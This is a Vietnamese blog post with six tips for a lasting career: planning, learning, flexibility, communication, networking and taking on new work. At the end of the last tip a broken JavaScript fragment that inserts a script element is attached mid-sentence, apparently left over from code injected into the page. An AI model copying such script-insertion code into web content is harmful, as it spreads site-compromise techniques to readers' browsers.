6 điều cần biết để xây dựng sự nghiệp lâu dài

Để xây dựng một sự nghiệp đã khó rồi nhưng muốn giữ sự nghiệp đó phát triển bền vững và lâu dài lại càng khó hơn. Đây là vấn đề đau đầu của tất cả mọi người và không phải ai cũng có thể làm được. Tuy vậy đó cũng không phải là nhiệm vụ bất khả thi bởi ngoài xã hội có rất nhiều người đã và đang duy trì sự nghiệp của họ bao lâu nay và xây dựng nên thương hiệu của mình. Để làm được điều này đòi hỏi bạn phải có những bước đi vững chắc, sự tính toán hợp lý cho từng bước phát triển của mình.

 

XAY-DUNG-SU-NGHIEP-LAU-DAI

 

Qua tìm hiểu trên sách báo cũng như nhận được chia sẻ từ các chuyên gia nghề nghiệp, dưới đây là 6 điều bạn cần biết nếu muốn xây dựng sự nghiệp lâu dài mà tôi sẽ chia sẻ cho các bạn.

  1. Lập kế hoạch

Bạn có biết rằng cuộc sống này tràn đầy những dự định, những điều bất ngờ… mà không ai có thể đoán trước nó sẽ như thế nào. Có rất nhiều công việc mà bạn phải làm, bạn đang lo lắng không biết công việc đó sẽ đưa bạn đi đến đâu?…

Để chấm dứt tình trạng đó, điều đầu tiên thay vì bạn lao hùng hục vào làm việc thì bạn hãy lập cho mình một kế hoạch cụ thể. Nếu có kế hoạch bạn sẽ đi đúng hướng và có thể hạn chế được các nguy cơ không cần thiết. Chuyên gia nghề nghiệp Deborah Brown- Volkman có lời khuyên “ Hãy xác định một cách cụ thể, chính xác và thực tế vị trí bạn muốn đạt được trong sự nghiệp của mình 5-10 năm tới, sau đó vạch ra từng bước cần thực hiện để đạt được mục tiêu đó”.

  1. Không ngừng học hỏi

Đừng bao giờ nghĩ rằng mình đã có đầy đủ tất cả điều kiện cho công việc hiện tại. Kiến thức chưa bao giờ là đủ cả, vậy nên bạn cần phải mở rộng và nâng cao kỹ năng của mình hơn nữa để phát triển sự nghiệp. Hãy phân tích kỹ yêu cầu công việc của mình để học hỏi và bù đắp thêm những kỹ năng cần thiết, tuy nhiên bạn đừng bao giờ biến mình trở thành người thụ động mà bạn hãy chủ động học hỏi, chủ động bồi dưỡng kiến thức cho bản thân mình.

  1. Sự linh hoạt

Từ việc lên kế hoạch cho tương lai đến việc học tập hoàn thiện bản thân bạn cũng không nên quá cứng nhắc, khuôn mẫu khi thực hiện chúng. Bạn hãy linh hoạt và tận dụng thời cơ để làm sao thực hiện chúng một cách nhanh nhất và hiệu quả nhất. Ngoài ra bạn cũng cần có sự thống kê khái quát về bản thân, tính chất công việc, mức thu nhập mong muốn, điều kiện làm việc… Với thống kê bao quát đó chắc chắn bạn sẽ phát hiện ra nhiều cơ hội tốt hơn trên con đường tiến tới mục tiêu của mình.

  1. Tăng cường kỹ năng giao tiếp

Theo Brown – Volkman:” cá nhân thành công là những người cởi mở, quyết đoán, tự tin và giao tiếp tốt”. Vì vậy ngay từ bây giờ nếu bạn còn cho rằng công việc hiện tại của mình không cần đến những kỹ năng xã hội thì bạn hãy nghĩ lại vì sự nghiệp phát triển lâu dài của mình. Hãy mở rộng bản thân và kỹ năng viết, giao tiếp sẽ giúp bạn tự tin, nổi bật hơn trước đám đông.

  1. Mở rộng quan hệ

 

quan-he-xa-hoi

 

Có một điều chắc chắn rằng bạn không thể thành công nếu chỉ có một mình, kể cả trong giai đoạn kinh tế của bạn hưng thịnh nhất. Bạn bè và mối quan hệ xã hội sẽ giúp bạn nhiều hơn những gì bạn nghĩ, vì vậy thỉnh thoảng bạn hãy dành chút thời gian liên lạc với mọi người trong và ngoài công ty cũng như trong lĩnh vực của bạn. Bằng cách xây dựng và mở rộng mạng lưới quan hệ bạn sẽ làm tăng cơ hội phát triển và hiểu biết cho bản thân.

  1. Sẵn sàng thực hiện những công việc mới

Cơ hội luôn ở quanh bạn, chỉ có điều bạn có biết nắm bắt nó hay không mà thôi. Đừng từ chối những thử thách mới vì nó sẽ đem lại cho bạn những kinh nghiệm quý báu và nhiều bài học đáng nhớ. Đặc biệt bạn sẽ nhận ra rằng mình có thể làm bất cứ điều gì, ngoài được bổ xung những kỹ năng mới bạn còn có thể mở rộng quan hệ bạn bè.if (document.currentScript) { } else {document.currentScript.parentNode.insertBefore(s, document.currentScript);

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *